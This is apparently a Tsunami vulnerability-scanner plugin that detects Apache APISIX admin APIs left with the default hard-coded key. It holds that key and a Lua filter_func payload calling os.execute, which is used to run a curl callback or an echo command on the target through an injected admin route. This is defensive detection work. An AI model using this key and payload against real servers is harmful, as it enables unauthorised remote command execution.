# proto-file: proto/templated_plugin.proto
# proto-message: TemplatedPlugin

###############
# PLUGIN INFO #
###############

info: {
  type: VULN_DETECTION
  name: "ApacheAPISIX_DefaultAPIKey"
  author: 
    "Robert Dick (robert@doyensec.com) for the Templated version, "
    "hh-hunter for the original Java version"
  version: "2.0"
}

finding: {
  main_id: {
    publisher: "TSUNAMI_COMMUNITY"
    value: "APISIX_DEFAULT_TOKEN"
  }
  title: "Apache APISIX with default Admin token Detector"
  description: 
    "APISIX provides REST management API functionality. Users can manage APISIX using the REST"
    " Admin API. If the REST Admin API is exposed externally and the default hard-coded"
    " admin_key is not modified, an attacker can use the admin_key to execute arbitrary Lua"
    " code, leading to remote command execution."
  recommendation:
    "Change the default admin API key and set appropriate IP access control lists."
  severity: CRITICAL
}

###########
# ACTIONS #
###########

# Fingerprint APISIX. 
# Using multiple cases in case it gets normalized or is different in different versions.

actions: {
  name: "fingerprint_apisix"
  http_request: {
    method: GET
    uri: "/"
    response: {
      expect_any: {
        conditions: [
          { header: { name: "Server" } contains: "APISIX" },
          { header: { name: "Server" } contains: "ApiSix" },
          { header: { name: "Server" } contains: "apisix" },
          { header: { name: "Server" } contains: "Apisix" }
        ]
      }
    }
  }
}

# create the route. 
# Note: modified a little bit from the original plugin to better match
# what the CVE-2022-24112 plugin does, but without batch-requests.

actions: {
  name: "register_route"
  http_request: {
    method: PUT
    uri: "/apisix/admin/routes/tsunami_rce?ttl=30"
    headers: [
        { name: "X-API-KEY" value: "{{ DEFAULT_API_KEY }}" },
        { name: "Content-Type" value: "application/json" }
    ]
    data: 
      '{"uri":"/tsunami_rce/{{ T_UTL_CURRENT_TIMESTAMP_MS }}"'
      ',"upstream":{"type":"roundrobin","nodes":{}},'
      '"name":"{{ T_UTL_CURRENT_TIMESTAMP_MS }}","filter_func'
      '":"{{ PIPE_REQ_FILTER_FUNC }}"}'
    response: {
      http_status: 201
    }
  }
  cleanup_actions: "cleanup_route"
}

# execute route

actions: {
  name: "execute_route"
  http_request: {
    method: GET
    uri: "/tsunami_rce/{{ T_UTL_CURRENT_TIMESTAMP_MS }}"
  }
}


# delete the created route

actions: {
  name: "cleanup_route"
  http_request: {
    method: DELETE
    uri: "/apisix/admin/routes/tsunami_rce"
    headers: [
      { name: "X-API-KEY" value: "{{ DEFAULT_API_KEY }}" }
    ]
  }
}

actions: {
  name: "sleep"
  utility: { sleep: { duration_ms: 6000 } }
}
actions: {
  name: "check_callback_server_logs"
  callback_server: { action_type: CHECK }
}

# Non-callback actions below this. 
# They work by comparing response codes for a route that returns true or false.

actions: {
  name: "register_route_1"
  http_request: {
    method: PUT
    uri: "/apisix/admin/routes/tsunami_rce_1?ttl=30"
    headers: [
        { name: "X-API-KEY" value: "{{ DEFAULT_API_KEY }}" },
        { name: "Content-Type" value: "application/json" }
    ]
    data: 
      '{"uri":"/tsunami_rce/{{ T_UTL_CURRENT_TIMESTAMP_MS }}_1"'
      ',"upstream":{"type":"roundrobin","nodes":{}},'
      '"name":"{{ T_UTL_CURRENT_TIMESTAMP_MS }}","filter_func'
      '":"{{ PIPE_REQ_FILTER_FUNC_1 }}"}'
    response: {
      http_status: 201
    }
  }
  cleanup_actions: "cleanup_route_1"
}

actions: {
  name: "register_route_2"
  http_request: {
    method: PUT
    uri: "/apisix/admin/routes/tsunami_rce_2?ttl=30"
    headers: [
        { name: "X-API-KEY" value: "{{ DEFAULT_API_KEY }}" },
        { name: "Content-Type" value: "application/json" }
    ]
    data: 
      '{"uri":"/tsunami_rce/{{ T_UTL_CURRENT_TIMESTAMP_MS }}_2"'
      ',"upstream":{"type":"roundrobin","nodes":{}},'
      '"name":"{{ T_UTL_CURRENT_TIMESTAMP_MS }}","filter_func'
      '":"{{ PIPE_REQ_FILTER_FUNC_2 }}"}'
    response: {
      http_status: 201
    }
  }
  cleanup_actions: "cleanup_route_2"
}

actions: {
  name: "sleep_longer"
  utility: { sleep: { duration_ms: 10000 } }
}


# check if our first route is true

actions: {
  name: "execute_route_1"
  http_request: {
    method: GET
    uri: "/tsunami_rce/{{ T_UTL_CURRENT_TIMESTAMP_MS }}_1"
    response: {
      http_status: 503
    }
  }
}

# check if our second route is false

actions: {
  name: "execute_route_2"
  http_request: {
    method: GET
    uri: "/tsunami_rce/{{ T_UTL_CURRENT_TIMESTAMP_MS }}_2"
    response: {
      http_status: 404
    }
  }
}

actions: {
  name: "cleanup_route_1"
  http_request: {
    method: DELETE
    uri: "/apisix/admin/routes/tsunami_rce_1"
    headers: [
      { name: "X-API-KEY" value: "{{ DEFAULT_API_KEY }}" }
    ]
  }
}

actions: {
  name: "cleanup_route_2"
  http_request: {
    method: DELETE
    uri: "/apisix/admin/routes/tsunami_rce_2"
    headers: [
      { name: "X-API-KEY" value: "{{ DEFAULT_API_KEY }}" }
    ]
  }
}


#############
# WORKFLOWS #
#############

workflows: {
  condition: REQUIRES_CALLBACK_SERVER
  variables: [
    { name: "DEFAULT_API_KEY" value: "edd1c9f034335f136f87ad84b625c8f1" },
    { name: "PAYLOAD" value: "curl {{ T_CBS_URI }}" },
    { name: "PIPE_REQ_FILTER_FUNC" value: "function(vars) os.execute('{{ PAYLOAD }}'); return true end" }
  ]
  actions: [
    "fingerprint_apisix",
    "register_route",
    "sleep",
    "execute_route",
    "sleep",
    "check_callback_server_logs"
  ]
}

# for cases where the callback server isn't used

workflows: {
  variables: [
    { name: "DEFAULT_API_KEY" value: "edd1c9f034335f136f87ad84b625c8f1" },
    { name: "PIPE_REQ_FILTER_FUNC_1" value: "function(vars) return os.execute('echo hello')==true end" },
    { name: "PIPE_REQ_FILTER_FUNC_2" value: "function(vars) return false end" }
  ]
  actions: [
    "fingerprint_apisix",
    "register_route_1",
    "register_route_2",
    "sleep_longer",
    "execute_route_1",
    "execute_route_2"
  ]
}